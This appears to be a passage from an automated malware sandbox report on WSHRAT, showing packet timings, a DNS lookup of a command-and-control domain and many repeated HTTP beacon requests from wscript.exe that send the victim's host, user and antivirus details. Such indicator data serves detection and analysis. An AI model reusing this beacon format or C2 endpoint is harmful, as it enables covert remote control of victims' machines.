                      Mar 22, 2023 11:39:07.144388914 CET497117045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:07.468220949 CET704549711103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:07.468367100 CET497117045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:07.468488932 CET497117045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:07.731021881 CET704549711103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:12.763797998 CET497127045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:12.965647936 CET704549712103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:12.965869904 CET497127045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:12.966341972 CET497127045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:13.254226923 CET704549712103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:13.254323006 CET497127045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:13.254470110 CET497127045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:13.510597944 CET704549712103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:18.394618034 CET497137045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:18.631515026 CET704549713103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:18.631679058 CET497137045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:18.634150028 CET497137045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:18.925338984 CET704549713103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:18.926035881 CET497137045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:18.926179886 CET497137045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:19.181071043 CET704549713103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:24.040966034 CET497147045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:24.263197899 CET704549714103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:24.263350964 CET497147045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:24.263756990 CET497147045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:24.494096994 CET704549714103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:24.494184017 CET497147045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:24.494296074 CET497147045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:24.712097883 CET704549714103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:32.027158022 CET497157045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:32.263060093 CET704549715103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:32.263400078 CET497157045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:32.263868093 CET497157045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:32.979810953 CET497157045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:33.188294888 CET704549715103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:33.188416958 CET497157045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:33.188576937 CET497157045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:33.387284040 CET704549715103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:38.442709923 CET497167045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:38.671196938 CET704549716103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:38.671870947 CET497167045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:38.695593119 CET497167045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:38.912091970 CET704549716103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:38.914232016 CET497167045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:38.914397955 CET497167045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:39.156043053 CET704549716103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:44.054112911 CET497177045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:44.282994986 CET704549717103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:44.283128977 CET497177045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:44.283624887 CET497177045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:44.546179056 CET704549717103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:44.546339989 CET497177045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:44.546479940 CET497177045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:44.765925884 CET704549717103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:50.112910032 CET497187045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:50.396272898 CET704549718103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:50.396420002 CET497187045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:50.397216082 CET497187045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:50.626499891 CET704549718103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:50.626636982 CET497187045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:50.626734972 CET497187045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:50.838795900 CET704549718103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:55.783734083 CET497197045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:56.011632919 CET704549719103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:56.011763096 CET497197045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:56.012176991 CET497197045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:56.236180067 CET704549719103.47.144.22192.168.2.3
                      Mar 22, 2023 11:39:56.236476898 CET497197045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:56.236776114 CET497197045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:39:56.461430073 CET704549719103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:01.334631920 CET497207045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:01.565391064 CET704549720103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:01.565572977 CET497207045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:01.578388929 CET497207045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:01.789261103 CET704549720103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:01.789411068 CET497207045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:01.791090965 CET497207045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:01.995688915 CET704549720103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:08.391000032 CET497217045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:08.629635096 CET704549721103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:08.629822016 CET497217045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:08.630285025 CET497217045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:08.872416019 CET704549721103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:08.872670889 CET497217045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:08.872854948 CET497217045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:09.107826948 CET704549721103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:13.975733995 CET497227045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:14.189692020 CET704549722103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:14.189934969 CET497227045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:14.190562010 CET497227045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:14.442977905 CET704549722103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:14.443187952 CET497227045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:14.443422079 CET497227045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:14.689380884 CET704549722103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:19.561739922 CET497237045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:19.768991947 CET704549723103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:19.769155979 CET497237045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:19.769701004 CET497237045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:19.981447935 CET704549723103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:19.985384941 CET497237045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:19.985970974 CET497237045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:20.187978029 CET704549723103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:25.151366949 CET497247045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:25.446392059 CET704549724103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:25.446614981 CET497247045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:25.447386026 CET497247045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:25.765117884 CET704549724103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:25.765208006 CET497247045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:25.765331030 CET497247045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:26.037151098 CET704549724103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:30.904362917 CET497257045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:31.130223036 CET704549725103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:31.130459070 CET497257045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:31.131057024 CET497257045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:31.388566971 CET704549725103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:31.388772011 CET497257045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:31.388914108 CET497257045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:31.690207958 CET704549725103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:36.502800941 CET497267045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:36.720693111 CET704549726103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:36.720971107 CET497267045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:36.721931934 CET497267045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:36.947315931 CET704549726103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:36.947438955 CET497267045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:36.947545052 CET497267045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:37.174211979 CET704549726103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:42.205729008 CET497277045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:42.429801941 CET704549727103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:42.429909945 CET497277045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:42.430466890 CET497277045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:42.664773941 CET704549727103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:42.664912939 CET497277045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:42.666086912 CET497277045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:42.888880968 CET704549727103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:47.768131971 CET497287045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:47.983385086 CET704549728103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:47.983524084 CET497287045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:47.984992981 CET497287045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:48.201569080 CET704549728103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:48.201731920 CET497287045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:48.201905012 CET497287045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:48.418164968 CET704549728103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:53.411237955 CET497297045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:53.626483917 CET704549729103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:53.626785994 CET497297045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:53.627793074 CET497297045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:53.837008953 CET704549729103.47.144.22192.168.2.3
                      Mar 22, 2023 11:40:53.837093115 CET497297045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:53.837235928 CET497297045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:40:54.044846058 CET704549729103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:00.629730940 CET497307045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:00.836034060 CET704549730103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:00.836148024 CET497307045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:00.836848974 CET497307045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:01.046806097 CET704549730103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:01.047061920 CET497307045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:01.047159910 CET497307045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:01.253143072 CET704549730103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:06.123452902 CET497317045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:06.384644032 CET704549731103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:06.384902000 CET497317045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:06.386063099 CET497317045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:06.719264984 CET704549731103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:06.719373941 CET497317045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:06.719757080 CET497317045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:06.984010935 CET704549731103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:11.818608999 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:12.038789988 CET704549732103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:12.038964987 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:12.041835070 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:12.574285984 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:12.857283115 CET704549732103.47.144.22192.168.2.3
                      Mar 22, 2023 11:41:12.857415915 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:12.857495070 CET497327045192.168.2.3103.47.144.22
                      Mar 22, 2023 11:41:13.119000912 CET704549732103.47.144.22192.168.2.3

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Mar 22, 2023 11:37:51.070846081 CET6270453192.168.2.38.8.8.8
                      Mar 22, 2023 11:37:51.197526932 CET53627048.8.8.8192.168.2.3

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Mar 22, 2023 11:37:51.070846081 CET192.168.2.38.8.8.80xdb34Standard query (0)chongmei33.publicvm.comA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Mar 22, 2023 11:37:51.197526932 CET8.8.8.8192.168.2.30xdb34No error (0)chongmei33.publicvm.com103.47.144.22A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • chongmei33.publicvm.com:7045

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.349698103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:37:51.449934959 CET102OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.349699103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:37:58.976360083 CET103OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      10192.168.2.349708103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:38:50.072460890 CET126OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      11192.168.2.349709103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:38:55.844826937 CET126OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      12192.168.2.349710103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:39:01.482922077 CET127OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      13192.168.2.349711103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:39:07.144388914 CET128OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      14192.168.2.349712103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:39:12.966341972 CET129OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      15192.168.2.349713103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:39:18.634150028 CET130OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      16192.168.2.349714103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:39:24.263756990 CET130OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      17192.168.2.349715103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:39:32.263868093 CET131OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Mar 22, 2023 11:39:32.979810953 CET132OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      18192.168.2.349716103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:39:38.695593119 CET132OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      19192.168.2.349717103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:39:44.283624887 CET133OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.349700103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:38:04.682959080 CET105OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      20192.168.2.349718103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:39:50.397216082 CET134OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      21192.168.2.349719103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:39:56.012176991 CET135OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      22192.168.2.349720103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:40:01.578388929 CET136OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      23192.168.2.349721103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:40:08.630285025 CET136OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      24192.168.2.349722103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:40:14.190562010 CET137OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      25192.168.2.349723103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:40:19.769701004 CET138OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      26192.168.2.349724103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:40:25.447386026 CET139OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      27192.168.2.349725103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:40:31.131057024 CET140OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      28192.168.2.349726103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:40:36.721931934 CET140OUTPOST /is-ready HTTP/1.1
                      Accept: */*
                      user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual Basic
                      Accept-Language: en-us
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: chongmei33.publicvm.com:7045
                      Content-Length: 0
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      29192.168.2.349727103.47.144.227045C:\Windows\System32\wscript.exe
                      TimestampkBytes transferredDirectionData
                      Mar 22, 2023 11:40:42.430466890 CET141OUTPOST /is-ready HTTP/1.1
                      Accept: */*
